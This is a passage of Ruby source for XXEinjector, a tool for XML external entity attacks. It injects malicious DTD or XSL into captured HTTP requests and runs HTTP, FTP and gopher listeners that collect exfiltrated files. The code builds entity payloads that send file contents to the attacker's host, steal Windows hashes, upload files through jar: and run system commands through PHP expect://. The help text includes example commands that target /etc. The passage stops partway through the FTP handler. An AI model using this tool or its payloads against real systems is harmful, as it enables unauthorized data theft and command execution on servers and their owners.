ARGV.each do |arg|
	host = arg.split("=")[1] if arg.include?("--host=")
	$path = arg.split("=")[1] if arg.include?("--path=")
	$file = arg.split("=")[1] if arg.include?("--file=")
	enum = arg.split("=")[1] if arg.include?("--oob=")
	$proto = "https" if arg.include?("--ssl")
	$proxy = arg.split("=")[1].split(":")[0] if arg.include?("--proxy=")
	$proxy_port = arg.split("=")[1].split(":")[1] if arg.include?("--proxy=")
	phpfilter = "y" if arg.include?("--phpfilter")
	enumall = "y" if arg.include?("--fast")
	$brute = arg.split("=")[1] if arg.include?("--brute=")
	$verbose = "y" if arg.include?("--verbose")
	xslt_port = arg.split("=")[1] if arg.include?("--xsltport=")
	http_port = arg.split("=")[1] if arg.include?("--httpport=")
	ftp_port = arg.split("=")[1] if arg.include?("--ftpport=")
	gopher_port = arg.split("=")[1] if arg.include?("--gopherport=")
	jar_port = arg.split("=")[1] if arg.include?("--jarport=")
	timeout = Integer(arg.split("=")[1]) if arg.include?("--timeout=")
	hashes = "y" if arg.include?("--hashes")
	upload = arg.split("=")[1] if arg.include?("--upload=")
	expect = arg.split("=")[1] if arg.include?("--expect=")
	enumports = arg.split("=")[1] if arg.include?("--enumports=")
	$urlencode = "y" if arg.include?("--urlencode")
	$dtdi = "n" if arg.include?("--nodtd")
	$xslt = "y" if arg.include?("--xslt")
	$direct = arg.split("=")[1] if arg.include?("--direct=")
	$logger = "y" if arg.include?("--logger")
	$brute = "logger" if arg.include?("--logger")
	$output = arg.split("=")[1] if arg.include?("--output=")
	$secfile = arg.split("=")[1] if arg.include?("--2ndfile=")
	$rproto = "netdoc" if arg.include?("--netdoc")
	$contimeout = Integer(arg.split("=")[1]) if arg.include?("--contimeout=")
	$port = Integer(arg.split("=")[1]) if arg.include?("--rport=")
	$remote = arg.split("=")[1] if arg.include?("--rhost=")
	$test = true if arg.include?("--test")
end

# show DTD to inject
if ARGV.include? "--dtd"
	if host == ""
		host = "YOUR_HOST"
	end
	if http_port == ""
		http_port = "HTTPPORT"
	end
	puts ""
	puts "<!DOCTYPE m [ <!ENTITY % remote SYSTEM \"http://#{host}:#{http_port}/file.dtd\">%remote;%int;%trick;]>"
	puts ""
	exit(1)

# show sample direct exploitation XML
elsif ARGV.include? "--xml"
	puts ""
	puts "<!DOCTYPE m [ <!ENTITY direct SYSTEM \"XXEINJECT\">]><tag>UNIQUEMARK&direct;UNIQUEMARK</tag>"
	puts ""
	exit(1)

# show main menu
elsif ARGV.nil? || (ARGV.size < 3 && $logger == "n") || (host == "" && $direct == "" && $logger == "n") || ($file == "" && $logger == "n") || ($path == "" && $brute == "" && hashes == "n" && upload == "" && expect == "" && enumports == "" && $xslt == "n" && $logger == "n")
	puts "XXEinjector by Jakub Pa\u0142aczy\u0144ski"
	puts ""
	puts "XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications."
	puts ""
	puts "Options:"
	puts "  --host	Mandatory - our IP address for reverse connections. (--host=192.168.0.2)"
	puts "  --file	Mandatory - file containing valid HTTP request with xml. You can also mark with \"XXEINJECT\" a point where DTD should be injected. (--file=/tmp/req.txt)"
	puts "  --path	Mandatory if enumerating directories - Path to enumerate. (--path=/etc)"
	puts "  --brute	Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)"
	puts "  --logger	Log results only. Do not send requests. HTTP logger looks for \"p\" parameter with results."
	puts ""
	puts "  --rhost	Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)"
	puts "  --rport	Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)"
	puts ""
	puts "  --oob		Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)"
	puts "  --direct	Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)"
	puts "  --2ndfile	File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)"
	puts "  --phpfilter	Use PHP filter to base64 encode target file before sending."
	puts "  --netdoc	Use netdoc protocol instead of file (Java)."
	puts "  --enumports	Enumerating unfiltered ports for reverse connection. Specify value \"all\" to enumerate all TCP ports. (--enumports=21,22,80,443,445)"
	puts ""
	puts "  --hashes	Steals Windows hash of the user that runs an application."
	puts "  --expect	Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)"
	puts "  --upload	Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)"
	puts "  --xslt	Tests for XSLT injection."
	puts ""
	puts "  --ssl		Use SSL."
	puts "  --proxy	Proxy to use. (--proxy=127.0.0.1:8080)"
	puts "  --httpport	Set custom HTTP port. (--httpport=80)"
	puts "  --ftpport	Set custom FTP port. (--ftpport=21)"
	puts "  --gopherport	Set custom gopher port. (--gopherport=70)"
	puts "  --jarport	Set custom port for uploading files using jar. (--jarport=1337)"
	puts "  --xsltport	Set custom port for XSLT injection test. (--xsltport=1337)"
	puts ""
	puts "  --test	This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server."
	puts "  --urlencode	URL encode injected DTD. This is default for URI."
	puts "  --nodtd	If you want to put DTD in request by yourself. Specify \"--dtd\" to show how DTD should look like."
	puts "  --output	Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)"
	puts "  --timeout	Timeout for receiving file/directory content. (--timeout=20)"
	puts "  --contimeout	Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)"
	puts "  --fast	Skip asking what to enumerate. Prone to false-positives."
	puts "  --verbose	Show verbose messages."
	puts ""
	puts "Example usage:"
	puts "  Enumerating /etc directory in HTTPS application:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl"
	puts "  Enumerating /etc directory using gopher for OOB method:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher"
	puts "  Second order exploitation:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt"
	puts "  Bruteforcing files using HTTP out of band method and netdoc protocol:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc"
	puts "  Enumerating using direct exploitation:"
	puts "  ruby #{__FILE__} --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK"
	puts "  Enumerating unfiltered ports:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --enumports=all"
	puts "  Stealing Windows hashes:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --hashes"
	puts "  Uploading files using Java jar:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf"
	puts "  Executing system commands using PHP expect:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls"
	puts "  Testing for XSLT injection:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --xslt"
	puts "  Log requests only:"
	puts "  ruby #{__FILE__} --logger --oob=http --output=/tmp/out.txt"
	puts ""
	exit(1)
else
	puts "XXEinjector by Jakub Pa\u0142aczy\u0144ski"
	puts ""
end

# EXECUTION

### Processing Request File ###

# Configure basic options

# set proxy
if $proxy == ""
	$proxy = nil
	$proxy_port = nil
end

# get connection host and port
if $logger == "n"
	z = 1
	loop do
		break if File.readlines($file)[z].chomp.empty?
		if File.readlines($file)[z].include?("Host: ")
			$remote = File.readlines($file)[z].split(" ")[1]
			if $remote.include?(":")
				$port = $remote.split(":")[1]
				$remote = $remote.split(":")[0]
			end
		end
		z = z + 1
	end
	if $port == 0
		if $proto == "http"
			$port = 80
		else
			$port = 443
		end	
	end
end

# Configure main request
def configreq()

	found = 0 # for detecting injected DTD

	# check HTTP method
	if File.readlines($file)[0].include?("GET ")
		$method = "get"
	end

	# get URI path
	$uri = File.readlines($file)[0].split(" ")[1]
	if $dtdi == "y"
		turi = URI.decode($uri).gsub("+", " ")
		if turi.include?("XXEINJECT")
			if $direct != ""
				$uri = $uri.sub("XXEINJECT", $rproto + ":///#{$directpath}")
			elsif $xslt == "n"
				$uri = $uri.sub("XXEINJECT", URI.encode($dtd).gsub("%20", "+"))
			else
				$uri = $uri.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
			end
			puts "DTD injected." if $verbose == "y"
			found = found + 1
		elsif turi.include?("<?xml")
			if $xslt == "n"
				$uri = $uri.sub("?>", "?>" + URI.encode($dtd).gsub("%20", "+"))
				$uri = $uri.sub(/(\?%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
				$uri = $uri.sub(/(%3f>)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
				$uri = $uri.sub(/(%3f%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			else
				if turi.match(/(\<\?xml)(.*)(&)/i)
					$uri = $uri.sub(/(\<\?xml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$uri = $uri.sub(/(%3c%3fxml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$uri = $uri.sub(/(%3c\?xml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$uri = $uri.sub(/(\<%3fxml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
				elsif turi.match(/(\<\?xml)(.*)/i)
					$uri = $uri.sub(/(\<\?xml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$uri = $uri.sub(/(%3c%3fxml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$uri = $uri.sub(/(%3c\?xml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$uri = $uri.sub(/(\<%3fxml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				end
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			end
		end
	end

	# get headers
	i = 1
	$headers = Hash.new
	loop do
		break if File.readlines($file)[i].chomp.empty?
		if !File.readlines($file)[i].include?("Host: ")
			header = File.readlines($file)[i].chomp
			if $dtdi == "y"
				if header.include?("XXEINJECT")
					if $direct != ""
						header = header.sub("XXEINJECT", $rproto + ":///#{$directpath}")
					elsif $urlencode == "y"
						if $xslt == "n"
							header = header.sub("XXEINJECT", URI.encode($dtd).gsub("%20", "+").gsub(";", "%3B"))
						else
							header = header.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D").gsub(";", "%3B"))
						end
					else
						if $xslt == "n"
							header = header.sub("XXEINJECT", $dtd)
						else
							header = header.sub("XXEINJECT", $xsl)
						end
					end
					puts "DTD injected." if $verbose == "y"
					found = found + 1
				end
			end
			if header.include?("Accept-Encoding") && $direct != ""
			else
				$headers[header.split(": ")[0]] = header.split(": ")[1]
			end
		end
		i = i + 1
	end

	# get POST body
	i = i + 1
	$post = ""
	postfind = 0
	if $method == "post"
		loop do
			break if File.readlines($file)[i].nil?
			postline = File.readlines($file)[i]
			if $dtdi == "y"
				tline = URI.decode(postline).gsub("+", " ")
				if tline.include?("XXEINJECT") && $xslt == "n"
					if $direct != ""
						postline = postline.sub("XXEINJECT", $rproto + ":///#{$directpath}")
					elsif $urlencode == "y"
						if $xslt == "n"
							postline = postline.sub("XXEINJECT", URI.encode($dtd).gsub("%20", "+"))
						else
							postline = postline.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
						end
					else
						if $xslt == "n"
							postline = postline.sub("XXEINJECT", $dtd)
						else
							postline = postline.sub("XXEINJECT", $xsl)
						end
					end
					puts "DTD injected." if $verbose == "y"
					found = found + 1
				elsif tline.include?("XXEINJECT") && $xslt == "y"
					postfind = 1
				elsif tline.include?("<?xml") && $xslt == "n"
					if $urlencode == "y"
							postline = postline.sub("?>", "?>" + URI.encode($dtd).gsub("%20", "+"))
							postline = postline.sub(/(\?%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
							postline = postline.sub(/(%3f>)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
							postline = postline.sub(/(%3f%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
					else
							postline = postline.sub("?>", "?>" + $dtd)
							postline = postline.sub(/(\?%3e)/i, '\1' + $dtd)
							postline = postline.sub(/(%3f>)/i, '\1' + $dtd)
							postline = postline.sub(/(%3f%3e)/i, '\1' + $dtd)
					end
					puts "DTD injected." if $verbose == "y"
					found = found + 1
				elsif tline.include?("<?xml") && $xslt == "y"
					postfind = 1
				end
			end
			$post += postline
			i = i + 1
		end
		if postfind == 1
			if $urlencode == "y"
				if $post.match(/(\<\?xml)(.*)(&)/im) || $post.match(/(%3c%3fxml)(.*)(&)/im) || $post.match(/(%3c\?xml)(.*)(&)/im) || $post.match(/(\<%3fxml)(.*)(&)/im)
					$post = $post.sub(/(\<\?xml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$post = $post.sub(/(%3c%3fxml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$post = $post.sub(/(%3c\?xml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$post = $post.sub(/(\<%3fxml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
				elsif $post.match(/(\<\?xml)(.*)/im) || $post.match(/(%3c%3fxml)(.*)/im) || $post.match(/(%3c\?xml)(.*)/im) || $post.match(/(\<%3fxml)(.*)/im)
					$post = $post.sub(/(\<\?xml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$post = $post.sub(/(%3c%3fxml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$post = $post.sub(/(%3c\?xml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$post = $post.sub(/(\<%3fxml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				else
					$post = $post.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				end
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			else
				if $post.match(/(\<\?xml)(.*)(&)/im) || $post.match(/(%3c%3fxml)(.*)(&)/im) || $post.match(/(%3c\?xml)(.*)(&)/im) || $post.match(/(\<%3fxml)(.*)(&)/im)
					$post = $post.sub(/(\<\?xml)(.*)(&)/im, $xsl + "&")
					$post = $post.sub(/(%3c%3fxml)(.*)(&)/im, $xsl + "&")
					$post = $post.sub(/(%3c\?xml)(.*)(&)/im, $xsl + "&")
					$post = $post.sub(/(\<%3fxml)(.*)(&)/im, $xsl + "&")
				elsif $post.match(/(\<\?xml)(.*)/im) || $post.match(/(%3c%3fxml)(.*)/im) || $post.match(/(%3c\?xml)(.*)/im) || $post.match(/(\<%3fxml)(.*)/im)
					$post = $post.sub(/(\<\?xml)(.*)/im, $xsl)
					$post = $post.sub(/(%3c%3fxml)(.*)/im, $xsl)
					$post = $post.sub(/(%3c\?xml)(.*)/im, $xsl)
					$post = $post.sub(/(\<%3fxml)(.*)/im, $xsl)
				else
					$post = $post.sub("XXEINJECT", $xsl.gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				end
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			end
		end
	end

	# update Content-Length header
	if $method == "post"
		$headers["Content-Length"] = String($post.bytesize)
	end

	# detect injected DTD
	if found == 0 && $dtdi == "y"
		puts "Automatic DTD injection was not successful. Please put \"XXEINJECT\" in request file where DTD should be placed or run XXEinjector with --nodtd if DTD was placed manually."
		exit(1)
	elsif found > 1
		puts "Multiple instances of XML found. It may results in false-positives."
	end

	# configuring request
	$request = Net::HTTP.new($remote, $port, $proxy, $proxy_port)

	# set HTTPS
	if $proto == "https"
		$request.use_ssl = true
		$request.verify_mode = OpenSSL::SSL::VERIFY_NONE
	end
end

### End of Processing Request File ###

### Configure request for 2nd order case ###
if $secfile != ""

	# check HTTP method
	if File.readlines($secfile)[0].include?("GET ")
		$secmethod = "get"
	end

	# get URI path
	$securi = File.readlines($secfile)[0].split(" ")[1]

	# get headers
	y = 1
	$secheaders = Hash.new
	loop do
		break if File.readlines($secfile)[y].chomp.empty?
		if !File.readlines($secfile)[y].include?("Host: ")
			header = File.readlines($secfile)[y].chomp
			if header.include?("Accept-Encoding")
			else
				$secheaders[header.split(": ")[0]] = header.split(": ")[1]
			end
		end
		y = y + 1
	end

	# get POST body
	y = y + 1
	$secpost = ""
	if $method == "post"
		loop do
			break if File.readlines($secfile)[y].nil?
			postline = File.readlines($secfile)[y]
			$secpost += postline
			y = y + 1
		end
	end

	# configuring 2nd request
	$secrequest = Net::HTTP.new($remote, $port, $proxy, $proxy_port)

	# set HTTPS
	if $proto == "https"
		$secrequest.use_ssl = true
		$secrequest.verify_mode = OpenSSL::SSL::VERIFY_NONE
	end
end

### End of Processing 2nd Request File ###

# Sending request
def sendreq()

	if $test == true
		puts "URL:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$uri}"
		else
			puts "https://#{$remote}:#{$port}#{$uri}"
		end
		puts "\nHeaders:"
		puts $headers
		if $method == "post"
			puts "\nPOST body:"
			puts $post
		end
		exit(1)
	end
	
	if $verbose == "y"
		puts "Sending request with malicious XML:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$uri}"
			puts $headers
			puts "\n"
			puts $post
			puts "\n"
		else
			puts "https://#{$remote}:#{$port}#{$uri}"
			puts $headers
			puts "\n"
			puts $post
			puts "\n"
		end
	else
		puts "Sending request with malicious XML."
	end

	$response = ""
	$request.start { |r|
		begin
			status = Timeout::timeout($time) {
    				if $method == "post"
					$response = r.post($uri, $post, $headers) 
				else
					$response = r.get($uri, $headers)
				end
  			}
		rescue Timeout::Error
		end
	}
end

# Sending second request
def send2ndreq()
	
	if $verbose == "y"
		puts "Sending second request:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$securi}"
			puts $secheaders
			puts "\n"
			puts $secpost
			puts "\n"
		else
			puts "https://#{$remote}:#{$port}#{$securi}"
			puts $secheaders
			puts "\n"
			puts $secpost
			puts "\n"
		end
	else
		puts "Sending second request."
	end
	
	$response = ""
	$secrequest.start { |r|
		begin
			status = Timeout::timeout($time) {
    				if $method == "post"
					$response = r.post($securi, $secpost, $secheaders) 
				else
					$response = r.get($securi, $secheaders)
				end
  			}
		rescue Timeout::Error
		end
	}
end

# logging to separate file or output file if in bruteforce mode
def log(param)
	if $brute == ""
		logpath = "#{$path}"
		if $direct == ""
			if $tmppath != "" && logpath[-1] != "/"
				logpath += "/"
			end
			logpath += "#{$tmppath}"
		else
			if $nextpath != "" && logpath[-1] != "/"
				logpath += "/"
			end
			logpath += "#{$nextpath}"
		end
		logpath = logpath.gsub('\\','/')
		logpath[0] = "" if logpath[0] == "/"
		logpath[-1] = "" if logpath[-1] == "/"
		if $tmppath != ""
			FileUtils.mkdir_p "Logs/" + $remote + "/" + logpath.split("/")[0..-2].join('/')
		else
			if logpath.include?("/")
				FileUtils.mkdir_p "Logs/" + $remote + "/" + logpath.split("/")[0..-2].join('/')
			else
				FileUtils.mkdir_p "Logs/" + $remote + "/" + logpath
			end
		end
		if  $done == 0
			if $cut == 1
				puts "Successfully logged file: /#{logpath}"
			else
				if logpath[-1] == ":"
					puts "Successfully logged file: #{logpath}/"
				else
					puts "Successfully logged file: #{logpath}"
				end
			end
			$done = 1
		end
		if logpath == ""
			log = File.open("Logs/" + $remote + "/" + "rootdir.log", "a")
		else
			log = File.open("Logs/" + $remote + "/" + "#{logpath}.log", "a")
		end
		log.write param
		log.close
	else
		log = File.open($output, "a")
		log.write param
		puts "Next results:\n#{param}\n" if $logger == "y" || $verbose == "y"
		print "> " if $logger == "y"
		log.close
	end
end

# pushing enumerated items to an array
def pusharr(param)
	if $brute == ""
		param = param.chomp
		if param.match $regex
			if $direct == ""
				logp = $tmppath
				if $tmppath != ""
					logp += "/"
				end
			else
				logp = $nextpath
				if $nextpath != ""
					logp += "/"
				end
			end
			logp += param
			$filenames.push(logp)
			puts "Path pushed to array: #{logp}" if $verbose == "y"
		end
	end
end

# initial changes
# set longer timeout for direct exploitation
if $direct != ""
	$time = 30
end

# Remove first slash if unix-like path specified
$cut = 0
if $path[0] == "/"
	$path[0] = ''
	$cut = 1
end

# Remove slash at the end if not Windows drive
if $path[-1] == "/" && $path[-2] != ":"
	$path[-1] = ''
end

# Add some changes to Windows path
if $cut == 0
	$path += '/' if $path[-1] == ":"
	$path = $path.gsub("\\", "/")
end

# configure payloads
# DTD to inject
$dtd = "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM \"http://#{host}:#{http_port}/file.dtd\">%remote;%int;%trick;]>"
# XSL to inject
$xsl = "<?xml version=\"1.0\"?><xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"><xsl:template match=\"/\"><xsl:variable name=\"cmd\" select=\"document('http://#{host}:#{xslt_port}/success')\"/><xsl:value-of select=\"$cmd\"/></xsl:template></xsl:stylesheet>"

# Starting servers
begin
	if ($xslt == "n" && enumports == "" && $direct == "" && $logger == "n") || ($logger == "y" && enum == "http")
		http = TCPServer.new http_port
	end
	if enum == "ftp" && $xslt == "n" && enumports == "" && $direct == ""
		ftp = TCPServer.new ftp_port
	end
	if enum == "gopher" && $xslt == "n" && enumports == "" && $direct == ""
		gopher = TCPServer.new gopher_port
	end
	if upload != ""
		jar = TCPServer.new jar_port
	end
	if $xslt == "y"
		xsltserv = TCPServer.new xslt_port
	end
rescue Errno::EADDRINUSE
	puts "Specified TCP ports already in use."
	exit(1)
end

# HTTP for XML serving and data retrival
Thread.start do
loop do
  Thread.start(http.accept) do |client|
	$done = 0
	$tmppath = $nextpath
	loop {

		params = {}
		req = client.gets()
		break if req.nil?

		# HTTP XML serving
		if req.include? "file.dtd"

			puts "Got request for XML:\n#{req}\n" if $verbose == "y"

			if hashes == "n" && upload == "" && expect == ""
				if $cut == 1
					puts "Responding with XML for: /#{enumpath}"
				else
					puts "Responding with XML for: #{enumpath}"
				end
			else
				puts "Responding with proper XML."
			end

			# respond with proper XML
			if hashes == "y"
				payload = "<!ENTITY % payl \"hashes\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM '#{$rproto}:////#{host}/hash/hash.txt'>\">"
				client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
			elsif upload != ""
				payload = "<!ENTITY % payl \"upload\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'jar:http://#{host}:#{jar_port}!/upload'>\">"
				client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
			elsif expect != ""
				if enum == "ftp"
					if phpfilter == "n"
						payload = "<!ENTITY % payl SYSTEM \"expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
					else
						payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
					end
				elsif enum == "http"
					if phpfilter == "n"
						payload = "<!ENTITY % payl SYSTEM \"expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
					else
						payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Type: application/xml\r\nContent-Length: #{payload.bytesize}\r\nConnection: close\r\n\r\n#{payload}")
					end
				end
			elsif enum == "ftp" && expect == ""
				if phpfilter == "n"
					payload = "<!ENTITY % payl SYSTEM \"#{$rproto}:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				else
					payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=file:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				end
			elsif enum == "http" && expect == ""
				if phpfilter == "n"
					payload = "<!ENTITY % payl SYSTEM \"#{$rproto}:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				else
					payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=file:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				end
			elsif enum == "gopher" && expect == ""
				payload = "<!ENTITY % payl SYSTEM \"#{$rproto}:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'gopher://#{host}:#{gopher_port}/?gopher=%payl;'>\">"
				client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
			end
			puts "XML payload sent:\n#{payload}\n\n" if $verbose == "y"

		end

		# HTTP data retrival
		if req.include? "?p="
			
			switch = 0
			puts "Response with file/directory content received:\n" + req + "\nEnumeration unlocked." if $verbose == "y"
			
			# retrieve p parameter value and respond
			req = req.sub("GET /?p=", "").split(" ")[0]
			client.print("HTTP/1.1 200 OK\r\nContent-Length: 6\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\nThanks")

			# base64 decode if parameter was encoded
			if phpfilter == "y"
				req = Base64.decode64(req)
			end

			# if PHP expect then print and exit
			if expect != ""
				puts "Result of \"#{expect}\" command:\n" + req
				exit(1)
			end

			# set proper splitter
			splitter = "%0A"
			splitter = "\n" if phpfilter == "y"

			req.split(splitter).each do |param|

				param = URI.decode(param)

				# logging to file
				log(param + "\n")

				# push to array if directory listing is detected for further enumeration
				pusharr(param)
			end
		end
		client.close
	}
  end
end
end

# FTP server to read files/directory listings and log to files
if enum == "ftp"
	Thread.start do
	loop do
  	  Thread.start(ftp.accept) do |client|
		$done = 0
		switch = 0
		puts "Response with file/directory content received. Enumeration unlocked." if $verbose == "y"
		$tmppath = $nextpath
		client.puts("220 XXEinjector Welcomes!")
		begin
		status = Timeout::timeout($contimeout) {
			loop {
				req = client.gets()
				break if req.nil?	
	
				# respond with proper option
				if req.include? "LIST"
					client.puts("drwxrwxrwx 1 xxe xxe          1 Jan 01 01:01 xxe")
					client.puts("150 Opening BINARY mode data connection for /xxe")
					client.puts("226 Transfer complete")
				end
				if req.include? "USER"
					client.puts("331 password required")
				end
				if req.include? "PORT"
					client.puts("200 PORT command OK")
				else
					client.puts("230 Now you can send data")
				end
			
				# truncate requests to proper format and base64 decode if encoded
				if req.include? "RETR "
					req = req.split(' ')[1..-1].join(' ')
					req += "\n"
				end
	
				if phpfilter == "y"
					req = Base64.decode64(req)
				end
	
				# if PHP expect then print and exit
				if expect != ""
					puts "Result of \"#{expect}\" command:\n" + req
					exit(1)
				end
				
				# logging to file
				log(req)	
	
				# clear requests that are known to be not part of directory listing
				req = req.chomp
				if req.include?("CWD ") || req.match(/^USER /) || req.match(/^PASS /) || req == "TYPE I" || req.include?("EPSV") || req == "TYPE A" || req == "LIST"
					req = ""
				end
	
				# push to array if directory listing is detected for further enumeration
				pusharr(req)
	
			}
		}
		rescue Timeout::Error
		end
